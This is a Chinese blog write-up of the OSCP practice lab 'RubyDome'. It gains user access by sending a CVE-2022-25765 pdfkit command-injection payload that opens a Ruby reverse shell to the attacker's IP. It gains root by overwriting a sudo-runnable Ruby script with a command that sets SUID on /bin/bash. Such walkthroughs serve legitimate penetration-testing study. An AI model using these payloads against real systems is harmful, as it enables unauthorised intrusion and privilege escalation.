OSCP靶场--RubyDome

0rch1d2024-03-30 10:46

OSCP靶场--RubyDome

考点(CVE-2022-25765 suid ruby提权)

1.nmap扫描

bash 复制代码 
┌──(root㉿kali)-[~/Desktop]
└─# nmap -Pn -sC -sV 192.168.249.22 --min-rate 2500
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-29 00:28 EDT
Nmap scan report for 192.168.249.22
Host is up (0.38s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_  256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
3000/tcp open  http    WEBrick httpd 1.7.0 (Ruby 3.0.2 (2021-07-07))
|_http-title: RubyDome HTML to PDF
|_http-server-header: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.03 seconds

2.user priv

bash 复制代码 
##
┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.249.22 - - [29/Mar/2024 00:33:00] "GET /test.html HTTP/1.1" 200 -

### 测试功能:
http://192.168.249.22:3000/

## google查找漏洞:rubydome exploit
https://github.com/UNICORDev/exploit-CVE-2022-25765
##

#######
## CVE-2022-35583 测试后发现是兔子洞:
https://github.com/advisories/GHSA-v2fj-q75c-65mr

###################
## 使用CVE-2022-25765反弹shell:
https://github.com/UNICORDev/exploit-CVE-2022-25765/blob/main/exploit-CVE-2022-25765.py


###################
##
┌──(root㉿kali)-[~/Desktop]
└─# python3 exploit-CVE-2022-25765.py -s 192.168.45.171 443 -w http://192.168.249.22:3000/pdf -p url 

        _ __,~~~/_        __  ___  _______________  ___  ___
    ,~~`( )_( )-\|       / / / / |/ /  _/ ___/ __ \/ _ \/ _ \
        |/|  `--.       / /_/ /    // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....
    
UNICORD: Exploit for CVE-2022--25765 (pdfkit) - Command Injection
OPTIONS: Reverse Shell Sent to Target Website Mode
PAYLOAD: http://%20`ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("192.168.45.171","443"))'`
LOCALIP: 192.168.45.171:443
WARNING: Be sure to start a local listener on the above IP and port. "nc -lnvp 443".
WEBSITE: http://192.168.249.22:3000/pdf
POSTARG: url
EXPLOIT: Payload sent to website!
SUCCESS: Exploit performed action.

######
##
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443                                                
listening on [any] 443 ...
192.168.249.22: inverse host lookup failed: Unknown host
connect to [192.168.45.171] from (UNKNOWN) [192.168.249.22] 35124
whoami
andrew
andrew@rubydome:~$ cat local.txt
cat local.txt
34095df9bf4237e08f9442df480866f1
andrew@rubydome:~$


这里发现是兔子洞:

反弹shell:burp抓包,exp调整:

3. root priv

bash 复制代码 
##
andrew@rubydome:~$ sudo -l
sudo -l
Matching Defaults entries for andrew on rubydome:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User andrew may run the following commands on rubydome:
    (ALL) NOPASSWD: /usr/bin/ruby /home/andrew/app/app.rb


####################
##
andrew@rubydome:~$ sudo -l
sudo -l
Matching Defaults entries for andrew on rubydome:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User andrew may run the following commands on rubydome:
    (ALL) NOPASSWD: /usr/bin/ruby /home/andrew/app/app.rb

### 当前用户可以读写/home/andrew/app/app.rb
andrew@rubydome:~$ ls -al /home/andrew/app/app.rb
ls -al /home/andrew/app/app.rb
-rwxrwx--- 1 andrew andrew 1032 Apr 24  2023 /home/andrew/app/app.rb

## 覆盖提权:kali:1.rb,开启http server:
system("chmod +s /bin/bash")

## 下载覆盖:
andrew@rubydome:~$ wget http://192.168.45.171/1.rb
wget http://192.168.45.171/1.rb
--2024-03-29 11:26:38--  http://192.168.45.171/1.rb
Connecting to 192.168.45.171:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29 [application/x-ruby]
Saving to: '1.rb'

1.rb                100%[===================>]      29  --.-KB/s    in 0s      

2024-03-29 11:26:39 (4.33 MB/s) - '1.rb' saved [29/29]

andrew@rubydome:~$ cat 1.rb > /home/andrew/app/app.rb
cat 1.rb > /home/andrew/app/app.rb
andrew@rubydome:~$ cat /home/andrew/app/app.rb
cat /home/andrew/app/app.rb
system("chmod +s /bin/bash")
andrew@rubydome:~$ sudo /usr/bin/ruby /home/andrew/app/app.rb
sudo /usr/bin/ruby /home/andrew/app/app.rb

## /bin/bash添加suid权限:
andrew@rubydome:~$ ls -al /bin/bash
ls -al /bin/bash
-rwsr-sr-x 1 root root 1396520 Jan  6  2022 /bin/bash
andrew@rubydome:~$ /bin/bash -p
/bin/bash -p
bash-5.1# id
id
uid=1001(andrew) gid=1001(andrew) euid=0(root) egid=0(root) groups=0(root),27(sudo),1001(andrew)
bash-5.1# cat /root/proof.txt
cat /root/proof.txt
a7f22b4d527dee98174daf20efbd168a
bash-5.1#

4.总结:

## CVE-2022-25765
https://github.com/UNICORDev/exploit-CVE-2022-25765/blob/main/exploit-CVE-2022-25765.py
## suid ruby提权:
https://gtfobins.github.io/gtfobins/ruby/#sudo
相关推荐
xuan哈哈哈38 分钟前
web基础—dvwa靶场(九)Weak Session IDs
web安全·网络安全
nomi-糯米2 小时前
Fisco Bcos 2.11.0配置console控制台2.10.0及部署调用智能合约
分布式·网络安全·区块链·智能合约·分布式账本
无敌的俊哥4 小时前
dedecms——四种webshell姿势
web安全
亿林科技网络安全6 小时前
阿里云盘照片事件!网络安全警钟长鸣
网络·安全·web安全
iSee8576 小时前
ChatGPT个人专用版 pictureproxy.php SSRF漏洞
web安全
HinsCoder7 小时前
【渗透测试】——Upload靶场实战(1-5关)
笔记·学习·安全·web安全·渗透测试·测试·upload靶场
Hqst_Kevin7 小时前
Hqst 品牌 H81801D 千兆 DIP 网络变压器在光猫收发器机顶盒中的应用
运维·服务器·网络·5g·网络安全·信息与通信·信号处理
网安康sir8 小时前
2024年三个月自学手册 网络安全(黑客技术)
网络·安全·web安全
热门推荐
01软件工程从理论到实践客观题汇总(头歌第一章至第八章)02RAG 实践- Ollama+RagFlow 部署本地知识库032024年高教社杯数学建模国赛C题超详细解题思路分析04【halcon】halcon字符识别——OCR05组基轨迹建模 GBTM的介绍与实现(Stata 或 R)06【2024数模国赛赛题思路公开】国赛B题思路丨附可运行代码丨无偿自提072024年网络安全比赛--系统渗透测试(超详细)08苍穹外卖面试总结09【2024高教社杯全国大学生数学建模竞赛】B题 生产过程中的决策问题——解题思路 代码 论文10分享几个惊艳的 Three.js 个人站点